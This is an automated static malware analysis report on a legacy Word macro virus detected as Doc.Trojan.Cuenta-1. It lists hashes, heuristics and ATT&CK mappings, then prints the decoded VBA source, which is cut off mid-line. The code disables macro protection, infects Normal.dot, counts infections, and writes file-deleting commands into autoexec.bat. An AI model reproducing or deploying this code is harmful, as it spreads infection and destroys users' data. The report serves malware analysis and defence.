Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b0df6ef1b509cf9e…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 37.0 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 9a20470af418dcc4c39bc4a3ab14ad99
SHA-1: f125bfba7e174b179080caaadfb1aea9214c0963
SHA-256: b0df6ef1b509cf9e1af9c2eef44b295e96ad9f46c2580e40cff885f935f92856
Risk Score: 240

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including AutoOpen and AutoClose functions, which are indicative of malicious intent. The script attempts to copy itself to the Normal.dot template, potentially infecting other documents. It also attempts to create a file named 'Cuenta.sys', suggesting a downloader or trojan component.

Heuristics (5)

  • ClamAV: Doc.Trojan.Cuenta-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Cuenta-1
  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro [high] OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12428 bytes
SHA-256: 7791d01357cfd1923f956edb0ed1c4bcc83541cdcadd3345ed8c88c8dc7a5dfd
Detection: ClamAV: Doc.Trojan.Cuenta-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function Infesta() As Boolean
On Error Resume Next
'Disable macro virus protection
Options.VirusProtection = False
Application.OrganizerCopy Source:= _
        Word.ActiveDocument.Path + "\" + Word.ActiveDocument.Name, Destination:= _
        Left(Application.Path, Len(Application.Path) - 7) + "\Plantillas\Normal.dot", Name:= _
        "NewMacros", Object:=wdOrganizerObjectProjectItems
 If Err.Number > 0 Then
    Infesta = False
    Application.OrganizerCopy Source:=Left(Application.Path, Len(Application.Path) - 7) + "\Plantillas\Normal.dot" _
        , Destination:=Word.ActiveDocument.Path + "\" + Word.ActiveDocument.Name _
        , Name:="NewMacros", Object:=wdOrganizerObjectProjectItems
 Else
    Infesta = True
End If
End Function
Sub AutoClose()
On Error Resume Next
Application.OrganizerCopy Source:=Left(Application.Path, Len(Application.Path) - 7) + "\Plantillas\Normal.dot" _
        , Destination:=Word.ActiveDocument.Path + "\" + Word.ActiveDocument.Name _
        , Name:="NewMacros", Object:=wdOrganizerObjectProjectItems
If Err.Number > 0 Then
Else
        Open Left(Application.Path, Len(Application.Path) - 7) + "\Plantillas\Cuenta.sys" For Append As 1
            Print #1, "Infectado el documento" + Word.ActiveDocument.Path + "\" + Word.ActiveDocument.Name
        Close #1
 End If
 Documents.Save NoPrompt:=True, OriginalFormat:=wdOriginalDocumentFormat
 End Sub
Sub autoOpen()
    Dim infesto As Boolean
    Dim I As Integer
    Dim Linea As String
    On Error Resume Next
    'Start infecting normal.dot if it is not already infected
    infesto = Infesta
    'Check whether 100 new documents have already been infected
    I = 0
    Open Left(Application.Path, Len(Application.Path) - 7) + "\Plantillas\Cuenta.sys" For Input As 1
    If Dir(Left(Application.Path, Len(Application.Path) - 7) + "\Plantillas\Cuenta.sys") <> "" Then
        Do While Not EOF(1)
            Line Input #1, Linea
            I = I + 1
        Loop
    Else
        I = 0
    End If
    Close #1
    If I > 50 Or I = 50 Then
        'Append this code to autoexec.bat
        Open "C:\autoexec.bat" For Append As 1
            Print #1, "Echo off"
            Print #1, "Echo. Autocheque del sistema, por favor espere un momento........."
            'Check whether deltree exists
            If Dir("c:\windows\command\deltree.exe") <> "" Then
                'Here we add the code to wipe the entire system
                Print #1, "c:\windows\command\Deltree *.* /y"
            Else
                'deltree does not exist
                Print #1, "del *.* /q"
                'Check whether this is NT or Win 9x
                If Dir("c:\winnt", vbDirectory) Then
                  Print #1, "del c:\winnt\system\*.*  /q"
                  Print #1, "del c:\winnt\system32\*.*  /q"
                  Print #1, "del c:\winnt\*.*  /q"
                  Print #1, "del c:\winnt\profiles\administrador\personal\*.* /q"
                  Print #1, "del *.*  /q"
                End If
                If Dir("c:\windows", vbDirectory) Then
                  Print #1, "del c:\windows\system\*.* "
                  Print #1, "del c:\windows\*.* /q"
                  If Dir("c:\mis documentos", vbDirectory) Then
                    Print #1, "del c:\mis documentos\*.*  /q"
                  End If
                  If Dir("c:\my documents", vbDirectory) Then
                    Print #1, "del c:\my documents\*.*  /q"
                  End If
                  Print #1, "del *.*  /q"
                End If
             End If
                
            Print #1, "Echo on"
            Print #1, "Echo. Lo Siento pero pedro te destruyo el sistema..."
            Print #1, "Echo. Graci
... (truncated)